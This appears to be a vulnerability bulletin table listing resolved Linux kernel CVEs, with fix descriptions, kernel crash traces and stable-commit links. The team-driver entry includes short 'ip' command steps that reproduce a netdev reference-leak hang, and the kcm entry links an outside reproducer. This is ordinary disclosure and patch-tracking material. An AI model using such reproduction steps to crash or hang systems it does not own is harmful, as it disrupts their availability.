| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: Replace BUG_ON with error handling for CNID count checks In a06ec283e125 next_id, folder_count, and file_count in the super block info were expanded to 64 bits, and BUG_ONs were added to detect overflow. This triggered an error reported by syzbot: if the MDB is corrupted, the BUG_ON is triggered. This patch replaces this mechanism with proper error handling and resolves the syzbot reported bug. Singed-off-by: Jori Koolstra <jkoolstra@xs4all.nl> | 2026-05-06 | not yet calculated | CVE-2026-43228 | https://git.kernel.org/stable/c/b6536c1ced315fa645576d3a39c6e07f2a472962 https://git.kernel.org/stable/c/b226804532a875c10276168dc55ce752944096bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix device cleanup order to prevent kernel panic Move video device unregistration to the beginning of the remove function to ensure all video operations are stopped before cleaning up the worker thread and disabling PM runtime. This prevents hardware register access after the device has been powered down. In polling mode, the hrtimer periodically triggers wave5_vpu_timer_callback() which queues work to the kthread worker. The worker executes wave5_vpu_irq_work_fn() which reads hardware registers via wave5_vdi_read_register(). The original cleanup order disabled PM runtime and powered down hardware before unregistering video devices. When autosuspend triggers and powers off the hardware, the video devices are still registered and the worker thread can still be triggered by the hrtimer, causing it to attempt reading registers from powered-off hardware. This results in a bus error (synchronous external abort) and kernel panic. This causes random kernel panics during encoding operations: Internal error: synchronous external abort: 0000000096000010 [#1] PREEMPT SMP Modules linked in: wave5 rpmsg_ctrl rpmsg_char ... CPU: 0 UID: 0 PID: 1520 Comm: vpu_irq_thread Tainted: G M W pc : wave5_vdi_read_register+0x10/0x38 [wave5] lr : wave5_vpu_irq_work_fn+0x28/0x60 [wave5] Call trace: wave5_vdi_read_register+0x10/0x38 [wave5] kthread_worker_fn+0xd8/0x238 kthread+0x104/0x120 ret_from_fork+0x10/0x20 Code: aa1e03e9 d503201f f9416800 8b214000 (b9400000) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: synchronous external abort: Fatal exception | 2026-05-06 | not yet calculated | CVE-2026-43229 | https://git.kernel.org/stable/c/b73d85231d5b1400a4fa5046cdac6c4d7cc6d969 https://git.kernel.org/stable/c/526816f2e331954d80fed8b37fa94efbbdde2b8d https://git.kernel.org/stable/c/dc2b7deae740a3ed138fb7ae17c97fa4055cfc5f https://git.kernel.org/stable/c/b74cedac643b02aefa7da881b58a3792859d9748 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: radio-keene: fix memory leak in error path Fix a memory leak in usb_keene_probe(). The v4l2 control handler is initialized and controls are added, but if v4l2_device_register() or video_register_device() fails afterward, the handler was never freed, leaking memory. Add v4l2_ctrl_handler_free() call in the err_v4l2 error path to ensure the control handler is properly freed for all error paths after it is initialized. | 2026-05-06 | not yet calculated | CVE-2026-43231 | https://git.kernel.org/stable/c/ad85bb5623079a35bd400f51de2e2fbc2170bdb2 https://git.kernel.org/stable/c/242b0aabb1866024a7995a767ac330c158b39aa4 https://git.kernel.org/stable/c/2fe28a63d598235595a9601e0d8fdc7c8f4fd575 https://git.kernel.org/stable/c/27c508f61963013fdf29097578284099ee7a85a4 https://git.kernel.org/stable/c/7fa9754f48cb8eefa566156be341e63d313247e5 https://git.kernel.org/stable/c/1d8558a232ecb187e8e0328d6347a125f437a0fc https://git.kernel.org/stable/c/de204d87e7d61859937272fe30cbdd46a4cfb10a https://git.kernel.org/stable/c/b8bf939d77c0cd01118e953bbf554e0fa15e9006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: avoid NETDEV_CHANGEMTU event when unregistering slave syzbot is reporting unregister_netdevice: waiting for netdevsim0 to become free. Usage count = 3 ref_tracker: netdev@ffff88807dcf8618 has 1/2 users at __netdev_tracker_alloc include/linux/netdevice.h:4400 [inline] netdev_hold include/linux/netdevice.h:4429 [inline] inetdev_init+0x201/0x4e0 net/ipv4/devinet.c:286 inetdev_event+0x251/0x1610 net/ipv4/devinet.c:1600 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_mtu net/core/dev.c:2318 [inline] netif_set_mtu_ext+0x5aa/0x800 net/core/dev.c:9886 netif_set_mtu+0xd7/0x1b0 net/core/dev.c:9907 dev_set_mtu+0x126/0x260 net/core/dev_api.c:248 team_port_del+0xb07/0xcb0 drivers/net/team/team_core.c:1333 team_del_slave drivers/net/team/team_core.c:1936 [inline] team_device_event+0x207/0x5b0 drivers/net/team/team_core.c:2929 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_extack net/core/dev.c:2281 [inline] call_netdevice_notifiers net/core/dev.c:2295 [inline] __dev_change_net_namespace+0xcb7/0x2050 net/core/dev.c:12592 do_setlink+0x2ce/0x4590 net/core/rtnetlink.c:3060 rtnl_changelink net/core/rtnetlink.c:3776 [inline] __rtnl_newlink net/core/rtnetlink.c:3935 [inline] rtnl_newlink+0x15a9/0x1be0 net/core/rtnetlink.c:4072 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 problem. Ido Schimmel found steps to reproduce ip link add name team1 type team ip link add name dummy1 mtu 1499 master team1 type dummy ip netns add ns1 ip link set dev dummy1 netns ns1 ip -n ns1 link del dev dummy1 and also found that the same issue was fixed in the bond driver in commit f51048c3e07b ("bonding: avoid NETDEV_CHANGEMTU event when unregistering slave"). Let's do similar thing for the team driver, with commit ad7c7b2172c3 ("net: hold netdev instance lock during sysfs operations") and commit 303a8487a657 ("net: s/__dev_set_mtu/__netif_set_mtu/") also applied. | 2026-05-06 | not yet calculated | CVE-2026-43234 | https://git.kernel.org/stable/c/bce42728ac4887060a24a585c5122fbd24939db7 https://git.kernel.org/stable/c/5268892de70f0b29bde341db863b234aa9259c08 https://git.kernel.org/stable/c/bb4c698633c0e19717586a6524a33196cff01a32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add missing platform data entries for SM8750 Two platform-data fields for SM8750 were missed: - get_vpu_buffer_size = iris_vpu33_buf_size Without this, the driver fails to allocate the required internal buffers, leading to basic decode/encode failures during session bring-up. - max_core_mbps = ((7680 * 4320) / 256) * 60 Without this capability exposed, capability checks are incomplete and v4l2-compliance for encoder fails. | 2026-05-06 | not yet calculated | CVE-2026-43235 | https://git.kernel.org/stable/c/1aa5833f29b88c16e9ad49a1782927754f3af742 https://git.kernel.org/stable/c/c7b2105a1cad1737eb877cdb4865618927623dd4 https://git.kernel.org/stable/c/bbef55f414100853d5bcea56a41f8b171bac8fcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash() Commit 38a6f0865796 ("net: sched: support hash selecting tx queue") added SKBEDIT_F_TXQ_SKBHASH support. The inclusive range size is computed as: mapping_mod = queue_mapping_max - queue_mapping + 1; The range size can be 65536 when the requested range covers all possible u16 queue IDs (e.g. queue_mapping=0 and queue_mapping_max=U16_MAX). That value cannot be represented in a u16 and previously wrapped to 0, so tcf_skbedit_hash() could trigger a divide-by-zero: queue_mapping += skb_get_hash(skb) % params->mapping_mod; Compute mapping_mod in a wider type and reject ranges larger than U16_MAX to prevent params->mapping_mod from becoming 0 and avoid the crash. | 2026-05-06 | not yet calculated | CVE-2026-43238 | https://git.kernel.org/stable/c/59809fda4da7730cfe84a948033f47eb45db073d https://git.kernel.org/stable/c/9c735a7d98c982a786b0db71eb6566ee00aaa04f https://git.kernel.org/stable/c/015cebdfcb97b5347fb7f598ea712a281cb35840 https://git.kernel.org/stable/c/4ece5eb4836f8ff03b9004dc2430a7169f282851 https://git.kernel.org/stable/c/3c2b95b26860bd6f8e2310d31ea1200d3f8f173e https://git.kernel.org/stable/c/be054cc66f739a9ba615dba9012a07fab8e7dd6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: add a sanity check on previous kernel's ima kexec buffer When the second-stage kernel is booted via kexec with a limiting command line such as "mem=<size>", the physical range that contains the carried over IMA measurement list may fall outside the truncated RAM leading to a kernel panic. BUG: unable to handle page fault for address: ffff97793ff47000 RIP: ima_restore_measurement_list+0xdc/0x45a #PF: error_code(0x0000) - not-present page Other architectures already validate the range with page_is_ram(), as done in commit cbf9c4b9617b ("of: check previous kernel's ima-kexec-buffer against memory bounds") do a similar check on x86. Without carrying the measurement list across kexec, the attestation would fail. | 2026-05-06 | not yet calculated | CVE-2026-43240 | https://git.kernel.org/stable/c/37f18915a261afe84dab462624ed829cddb77a9b https://git.kernel.org/stable/c/22e460b6333a5f818b042ac89201f8e735556f4a https://git.kernel.org/stable/c/f8f73bf0f8a57ee9b86792456bd42079bc98c6b7 https://git.kernel.org/stable/c/d4a132f121c591b60dbaf57ea91f1faf11631fbc https://git.kernel.org/stable/c/4d7a8f5f28187e3d2958b2a134473da2665207e7 https://git.kernel.org/stable/c/c5489d04337b47e93c0623e8145fcba3f5739efd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntb: ntb_hw_switchtec: Fix array-index-out-of-bounds access Number of MW LUTs depends on NTB configuration and can be set to MAX_MWS, This patch protects against invalid index out of bounds access to mw_sizes When invalid access print message to user that configuration is not valid. | 2026-05-06 | not yet calculated | CVE-2026-43241 | https://git.kernel.org/stable/c/348e1ac9ad983ed7e62de14e1daf47f1695a4ce9 https://git.kernel.org/stable/c/ee02c4f980c91820845dd8e469ec7dc670ab6d9d https://git.kernel.org/stable/c/740945de896021b9a859e71f38f6aea72a6393cf https://git.kernel.org/stable/c/85c9daa1f8319bbb3dfee71dc6a2f969cd3b4c92 https://git.kernel.org/stable/c/0e930420945106151c6eb3d7837b4e6154e9b144 https://git.kernel.org/stable/c/2346856b74823a2a78109002e479a3d02526a9ce https://git.kernel.org/stable/c/47ce292dd45dc689747c40603222691638919189 https://git.kernel.org/stable/c/c8ba7ad2cc1c7b90570aa347b8ebbe279f1eface |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: k3-socinfo: Fix regmap leak on probe failure The mmio regmap allocated during probe is never freed. Switch to using the device managed allocator so that the regmap is released on probe failures (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2026-43242 | https://git.kernel.org/stable/c/c97c21d342838b2a7787b0f1d6ad417e85c906f6 https://git.kernel.org/stable/c/b1006b5892ec8a95d039a89b47e6fd69cf607405 https://git.kernel.org/stable/c/458136527fe127fd051c1c9537f4540849780d70 https://git.kernel.org/stable/c/d451bf970a0c54b586f8b3161261bdf35d463c99 https://git.kernel.org/stable/c/eaa16059f9af26d8b8a6f3e887649f58e8ca96c9 https://git.kernel.org/stable/c/ab1ac24c407e4df326d7154a4deadd444e9209d9 https://git.kernel.org/stable/c/bbaa9e615608c204d384a7d4b1a434580a142d4c https://git.kernel.org/stable/c/c933138d45176780fabbbe7da263e04d5b3e525d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add signal type check for dcn401 get_phyd32clk_src Trying to access link enc on a dpia link will cause a crash otherwise | 2026-05-06 | not yet calculated | CVE-2026-43243 | https://git.kernel.org/stable/c/23e7150afc70da615857f9f07b494ec58540f096 https://git.kernel.org/stable/c/486b2909ac284185900c06f05ffc6eca895f38b8 https://git.kernel.org/stable/c/e332112255afbce02db67760f5743a1b13aa8541 https://git.kernel.org/stable/c/c979d8db7b0f293111f2e83795ea353c8ed75de9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: fix zero-frag skb in frag_list on partial sendmsg error Syzkaller reported a warning in kcm_write_msgs() when processing a message with a zero-fragment skb in the frag_list. When kcm_sendmsg() fills MAX_SKB_FRAGS fragments in the current skb, it allocates a new skb (tskb) and links it into the frag_list before copying data. If the copy subsequently fails (e.g. -EFAULT from user memory), tskb remains in the frag_list with zero fragments: head skb (msg being assembled, NOT yet in sk_write_queue) +-----------+ | frags[17] | (MAX_SKB_FRAGS, all filled with data) | frag_list-+--> tskb +-----------+ +----------+ | frags[0] | (empty! copy failed before filling) +----------+ For SOCK_SEQPACKET with partial data already copied, the error path saves this message via partial_message for later completion. For SOCK_SEQPACKET, sock_write_iter() automatically sets MSG_EOR, so a subsequent zero-length write(fd, NULL, 0) completes the message and queues it to sk_write_queue. kcm_write_msgs() then walks the frag_list and hits: WARN_ON(!skb_shinfo(skb)->nr_frags) TCP has a similar pattern where skbs are enqueued before data copy and cleaned up on failure via tcp_remove_empty_skb(). KCM was missing the equivalent cleanup. Fix this by tracking the predecessor skb (frag_prev) when allocating a new frag_list entry. On error, if the tail skb has zero frags, use frag_prev to unlink and free it in O(1) without walking the singly-linked frag_list. frag_prev is safe to dereference because the entire message chain is only held locally (or in kcm->seq_skb) and is not added to sk_write_queue until MSG_EOR, so the send path cannot free it underneath us. Also change the WARN_ON to WARN_ON_ONCE to avoid flooding the log if the condition is somehow hit repeatedly. There are currently no KCM selftests in the kernel tree; a simple reproducer is available at [1]. [1] https://gist.github.com/mrpre/a94d431c757e8d6f168f4dd1a3749daa | 2026-05-06 | not yet calculated | CVE-2026-43244 | https://git.kernel.org/stable/c/9ea3671d70ee07480d80bebe86696397c4e99fb7 https://git.kernel.org/stable/c/b1e3edf688a88c1a3ac41657055d9c136a08cd25 https://git.kernel.org/stable/c/7af58f76e4b404a74c836881a845e6652db8a09f https://git.kernel.org/stable/c/ca220141fa8ebae09765a242076b2b77338106b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c/tw9906: Fix potential memory leak in tw9906_probe() In one of the error paths in tw9906_probe(), the memory allocated in v4l2_ctrl_handler_init() and v4l2_ctrl_new_std() is not freed. Fix that by calling v4l2_ctrl_handler_free() on the handler in that error path. | 2026-05-06 | not yet calculated | CVE-2026-43246 | https://git.kernel.org/stable/c/e9a490937942f18205dac7b6b192975ef1369ae1 https://git.kernel.org/stable/c/9548a8bbf511a252a9848f96220c6b95c9a3b918 https://git.kernel.org/stable/c/0c33338514d8246280533a77091e6b6ee548c606 https://git.kernel.org/stable/c/ccb92def042a3636ed47f25a30bd553788e5191e https://git.kernel.org/stable/c/fb09d8b80046216646f1a344410cfa9cfa6c6c7c https://git.kernel.org/stable/c/377a7756914364d72550fc86ca0f404ef1d96141 https://git.kernel.org/stable/c/59420d5d9c46b084e21f9ea6ce79fc79ae9e414c https://git.kernel.org/stable/c/cad237b6c875fbee5d353a2b289e98d240d17ec8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix SError of kernel panic when closed SError of kernel panic rarely happened while testing fluster. The root cause was to enter suspend mode because timeout of autosuspend delay happened. [ 48.834439] SError Interrupt on CPU0, code 0x00000000bf000000 -- SError [ 48.834455] CPU: 0 UID: 0 PID: 1067 Comm: v4l2h265dec0:sr Not tainted 6.12.9-gc9e21a1ebd75-dirty #7 [ 48.834461] Hardware name: ti Texas Instruments J721S2 EVM/Texas Instruments J721S2 EVM, BIOS 2025.01-00345-gbaf3aaa8ecfa 01/01/2025 [ 48.834464] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 48.834468] pc : wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834488] lr : wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834495] sp : ffff8000856e3a30 [ 48.834497] x29: ffff8000856e3a30 x28: ffff0008093f6010 x27: ffff000809158130 [ 48.834504] x26: 0000000000000000 x25: ffff00080b625000 x24: ffff000804a9ba80 [ 48.834509] x23: ffff000802343028 x22: ffff000809158150 x21: ffff000802218000 [ 48.834513] x20: ffff0008093f6000 x19: ffff0008093f6000 x18: 0000000000000000 [ 48.834518] x17: 0000000000000000 x16: 0000000000000000 x15: 0000ffff74009618 [ 48.834523] x14: 000000010000000c x13: 0000000000000000 x12: 0000000000000000 [ 48.834527] x11: ffffffffffffffff x10: ffffffffffffffff x9 : ffff000802343028 [ 48.834532] x8 : ffff00080b6252a0 x7 : 0000000000000038 x6 : 0000000000000000 [ 48.834536] x5 : ffff00080b625060 x4 : 0000000000000000 x3 : 0000000000000000 [ 48.834541] x2 : 0000000000000000 x1 : ffff800084bf0118 x0 : ffff800084bf0000 [ 48.834547] Kernel panic - not syncing: Asynchronous SError Interrupt [ 48.834549] CPU: 0 UID: 0 PID: 1067 Comm: v4l2h265dec0:sr Not tainted 6.12.9-gc9e21a1ebd75-dirty #7 [ 48.834554] Hardware name: ti Texas Instruments J721S2 EVM/Texas Instruments J721S2 EVM, BIOS 2025.01-00345-gbaf3aaa8ecfa 01/01/2025 [ 48.834556] Call trace: [ 48.834559] dump_backtrace+0x94/0xec [ 48.834574] show_stack+0x18/0x24 [ 48.834579] dump_stack_lvl+0x38/0x90 [ 48.834585] dump_stack+0x18/0x24 [ 48.834588] panic+0x35c/0x3e0 [ 48.834592] nmi_panic+0x40/0x8c [ 48.834595] arm64_serror_panic+0x64/0x70 [ 48.834598] do_serror+0x3c/0x78 [ 48.834601] el1h_64_error_handler+0x34/0x4c [ 48.834605] el1h_64_error+0x64/0x68 [ 48.834608] wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834615] wave5_vpu_dec_clr_disp_flag+0x54/0x80 [wave5] [ 48.834622] wave5_vpu_dec_buf_queue+0x19c/0x1a0 [wave5] [ 48.834628] __enqueue_in_driver+0x3c/0x74 [videobuf2_common] [ 48.834639] vb2_core_qbuf+0x508/0x61c [videobuf2_common] [ 48.834646] vb2_qbuf+0xa4/0x168 [videobuf2_v4l2] [ 48.834656] v4l2_m2m_qbuf+0x80/0x238 [v4l2_mem2mem] [ 48.834666] v4l2_m2m_ioctl_qbuf+0x18/0x24 [v4l2_mem2mem] [ 48.834673] v4l_qbuf+0x48/0x5c [videodev] [ 48.834704] __video_do_ioctl+0x180/0x3f0 [videodev] [ 48.834725] video_usercopy+0x2ec/0x68c [videodev] [ 48.834745] video_ioctl2+0x18/0x24 [videodev] [ 48.834766] v4l2_ioctl+0x40/0x60 [videodev] [ 48.834786] __arm64_sys_ioctl+0xa8/0xec [ 48.834793] invoke_syscall+0x44/0x100 [ 48.834800] el0_svc_common.constprop.0+0xc0/0xe0 [ 48.834804] do_el0_svc+0x1c/0x28 [ 48.834809] el0_svc+0x30/0xd0 [ 48.834813] el0t_64_sync_handler+0xc0/0xc4 [ 48.834816] el0t_64_sync+0x190/0x194 [ 48.834820] SMP: stopping secondary CPUs [ 48.834831] Kernel Offset: disabled [ 48.834833] CPU features: 0x08,00002002,80200000,4200421b [ 48.834837] Memory Limit: none [ 49.161404] ---[ end Kernel panic - not syncing: Asynchronous SError Interrupt ]--- | 2026-05-06 | not yet calculated | CVE-2026-43247 | https://git.kernel.org/stable/c/27cb12b7dc88c51582094eeb2b65b0e94603e411 https://git.kernel.org/stable/c/5da55243fe190c2165ed34e77091a43c0ff74f10 https://git.kernel.org/stable/c/cbb9c0d50e471483cced55f5b7db4569dcd959a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke() The ChipIdea UDC driver can encounter "not page aligned sg buffer" errors when a USB device is reconnected after being disconnected during an active transfer. This occurs because _ep_nuke() returns requests to the gadget layer without properly unmapping DMA buffers or cleaning up scatter-gather bounce buffers. Root cause: When a disconnect happens during a multi-segment DMA transfer, the request's num_mapped_sgs field and sgt.sgl pointer remain set with stale values. The request is returned to the gadget driver with status -ESHUTDOWN but still has active DMA state. If the gadget driver reuses this request on reconnect without reinitializing it, the stale DMA state causes _hardware_enqueue() to skip DMA mapping (seeing non-zero num_mapped_sgs) and attempt to use freed/invalid DMA addresses, leading to alignment errors and potential memory corruption. The normal completion path via _hardware_dequeue() properly calls usb_gadget_unmap_request_by_dev() and sglist_do_debounce() before returning the request. The _ep_nuke() path must do the same cleanup to ensure requests are returned in a clean, reusable state. Fix: Add DMA unmapping and bounce buffer cleanup to _ep_nuke() to mirror the cleanup sequence in _hardware_dequeue(): - Call usb_gadget_unmap_request_by_dev() if num_mapped_sgs is set - Call sglist_do_debounce() with copy=false if bounce buffer exists This ensures that when requests are returned due to endpoint shutdown, they don't retain stale DMA mappings. The 'false' parameter to sglist_do_debounce() prevents copying data back (appropriate for shutdown path where transfer was aborted). | 2026-05-06 | not yet calculated | CVE-2026-43250 | https://git.kernel.org/stable/c/1b72b834511d17f4d069d512f78671f3f210a2f1 https://git.kernel.org/stable/c/f4fbf2d4750d12ac8525d2efac1016fa0d84d4ec https://git.kernel.org/stable/c/e74c436f8568af1c60942469d0a2300b3ada3857 https://git.kernel.org/stable/c/cea2a1257a3b5ea3e769a445b34af13e6aa5a123 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: prodikeys: Check presence of pm->input_ep82 Fake USB devices can send their own report descriptors for which the input_mapping() hook does not get called. In this case, pm->input_ep82 stays NULL, which leads to a crash later. This does not happen with the real device, but can be provoked by imposing as one. | 2026-05-06 | not yet calculated | CVE-2026-43251 | https://git.kernel.org/stable/c/f580c79683356632f12f2c2029f2fe936d953aa1 https://git.kernel.org/stable/c/ee572578f09f0e743e9383393a75c3a7a0f9b4c2 https://git.kernel.org/stable/c/edccbf7d6dc05d692bde3a89de5a4001f72a0fa4 https://git.kernel.org/stable/c/3f1b21cc67a15d7d081378a9b8747dd000a017b8 https://git.kernel.org/stable/c/e7ac1cd823cd2e9fcbd5cb0b261d6d35dbb79341 https://git.kernel.org/stable/c/d5512ce892f774d37c53082adadfcad04f21b50e https://git.kernel.org/stable/c/d08f35f843881ec504d7537a9bb728a073db3366 https://git.kernel.org/stable/c/cee8337e1bad168136aecfe6416ecd7d3aa7529a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: in-kernel: always set ID as avail when rm endp Syzkaller managed to find a combination of actions that was generating this warning: WARNING: net/mptcp/pm_kernel.c:1074 at __mark_subflow_endp_available net/mptcp/pm_kernel.c:1074 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_fullmesh net/mptcp/pm_kernel.c:1446 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_set_flags_all net/mptcp/pm_kernel.c:1474 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_set_flags+0x5de/0x640 net/mptcp/pm_kernel.c:1538, CPU#1: syz.7.48/2535 Modules linked in: CPU: 1 UID: 0 PID: 2535 Comm: syz.7.48 Not tainted 6.18.0-03987-gea5f5e676cf5 #17 PREEMPT(voluntary) Hardware name: QEMU Ubuntu 25.10 PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:__mark_subflow_endp_available net/mptcp/pm_kernel.c:1074 [inline] RIP: 0010:mptcp_pm_nl_fullmesh net/mptcp/pm_kernel.c:1446 [inline] RIP: 0010:mptcp_pm_nl_set_flags_all net/mptcp/pm_kernel.c:1474 [inline] RIP: 0010:mptcp_pm_nl_set_flags+0x5de/0x640 net/mptcp/pm_kernel.c:1538 Code: 89 c7 e8 c5 8c 73 fe e9 f7 fd ff ff 49 83 ef 80 e8 b7 8c 73 fe 4c 89 ff be 03 00 00 00 e8 4a 29 e3 fe eb ac e8 a3 8c 73 fe 90 <0f> 0b 90 e9 3d ff ff ff e8 95 8c 73 fe b8 a1 ff ff ff eb 1a e8 89 RSP: 0018:ffffc9001535b820 EFLAGS: 00010287 netdevsim0: tun_chr_ioctl cmd 1074025677 RAX: ffffffff82da294d RBX: 0000000000000001 RCX: 0000000000080000 RDX: ffffc900096d0000 RSI: 00000000000006d6 RDI: 00000000000006d7 netdevsim0: linktype set to 823 RBP: ffff88802cdb2240 R08: 00000000000104ae R09: ffffffffffffffff R10: ffffffff82da27d4 R11: 0000000000000000 R12: 0000000000000000 R13: ffff88801246d8c0 R14: ffffc9001535b8b8 R15: ffff88802cdb1800 FS: 00007fc6ac5a76c0(0000) GS:ffff8880f90c8000(0000) knlGS:0000000000000000 netlink: 'syz.3.50': attribute type 5 has an invalid length. CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 netlink: 1232 bytes leftover after parsing attributes in process `syz.3.50'. CR2: 0000200000010000 CR3: 0000000025b1a000 CR4: 0000000000350ef0 Call Trace: <TASK> mptcp_pm_set_flags net/mptcp/pm_netlink.c:277 [inline] mptcp_pm_nl_set_flags_doit+0x1d7/0x210 net/mptcp/pm_netlink.c:282 genl_family_rcv_msg_doit+0x117/0x180 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x3a8/0x3f0 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x16d/0x240 net/netlink/af_netlink.c:2550 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x3e9/0x4c0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x4ab/0x5b0 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:718 [inline] __sock_sendmsg+0xc9/0xf0 net/socket.c:733 ____sys_sendmsg+0x272/0x3b0 net/socket.c:2608 ___sys_sendmsg+0x2de/0x320 net/socket.c:2662 __sys_sendmsg net/socket.c:2694 [inline] __do_sys_sendmsg net/socket.c:2699 [inline] __se_sys_sendmsg net/socket.c:2697 [inline] __x64_sys_sendmsg+0x110/0x1a0 net/socket.c:2697 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xed/0x360 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fc6adb66f6d Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007fc6ac5a6ff8 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007fc6addf5fa0 RCX: 00007fc6adb66f6d RDX: 0000000000048084 RSI: 00002000000002c0 RDI: 000000000000000e RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 000000000000 ---truncated--- | 2026-05-06 | not yet calculated | CVE-2026-43252 | https://git.kernel.org/stable/c/d90d73ad183566c81320d453a223f610a280f210 https://git.kernel.org/stable/c/1b3ff4d88b508b73e2bbddb59356311efb7ba192 https://git.kernel.org/stable/c/7c1d221e475e3d8eb8ed4702392d43f8c5134d1f https://git.kernel.org/stable/c/7e4d88e36e5d0b8ffda637999cbca64c81701a81 https://git.kernel.org/stable/c/4d480efd98e290c445f4ba476e4dcda5624b1aab https://git.kernel.org/stable/c/d191101dee25567c2af3b28565f45346c33d65f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: libertas: fix WARNING in usb_tx_block The function usb_tx_block() submits cardp->tx_urb without ensuring that any previous transmission on this URB has completed. If a second call occurs while the URB is still active (e.g. during rapid firmware loading), usb_submit_urb() detects the active state and triggers a warning: 'URB submitted while active'. Fix this by enforcing serialization: call usb_kill_urb() before submitting the new request. This ensures the URB is idle and safe to reuse. | 2026-05-06 | not yet calculated | CVE-2026-43255 | https://git.kernel.org/stable/c/498525d8358d6d20918787e59736d5b6a021e9fd https://git.kernel.org/stable/c/2902a9b4415a6bafc9b1e5dd360f065d757a0bb7 https://git.kernel.org/stable/c/948a39c95d0f8d73722910f8cdb7b6e3e9206232 https://git.kernel.org/stable/c/5bfb25495e391a1be0db94b15715174fa06b93a1 https://git.kernel.org/stable/c/b82073564373e68c6ae3a96039fae14cd002a496 https://git.kernel.org/stable/c/3308c7504e093b22e91a4468470309cee2e26b83 https://git.kernel.org/stable/c/fc188b44547dea4e7350833171982a6312befde9 https://git.kernel.org/stable/c/d66676e6ca96bf8680f869a9bd6573b26c634622 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: cx88: Add missing unmap in snd_cx88_hw_params() In error path, add cx88_alsa_dma_unmap() to release resource acquired by cx88_alsa_dma_map(). | 2026-05-06 | not yet calculated | CVE-2026-43257 | https://git.kernel.org/stable/c/f0d7f735eba963742009b0706e19dd0bed91537a https://git.kernel.org/stable/c/dc911fccc6e08ef46a66b2a42a764252b001ee3c https://git.kernel.org/stable/c/24f3dabeb97bd0bec8c1c926c97e3eb6a8129225 https://git.kernel.org/stable/c/10ab64f8efc2f479293dce929fde326c285fc96f https://git.kernel.org/stable/c/e3fb15aadfc8643203bbdf97ace0396e4586fa64 https://git.kernel.org/stable/c/1ce8c2a8f050a23240553c8bae628ac623f9dbc1 https://git.kernel.org/stable/c/3baefeeb7b85e1e34eebef399ffa312be7179e30 https://git.kernel.org/stable/c/dbc527d980f7ba8559de38f8c1e4158c71a78915 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: fsl-imx8mq-usb: set platform driver data Add missing platform_set_drvdata() as the data will be used in remove(). | 2026-05-06 | not yet calculated | CVE-2026-43259 | https://git.kernel.org/stable/c/42d9509161d0539767ba875f3ef6b4b3c0b425ed https://git.kernel.org/stable/c/06db8c06d94858cda4b3870f421a1aeeef617690 https://git.kernel.org/stable/c/debf8326a435ac746f48173e4742a574810f1ff4 |
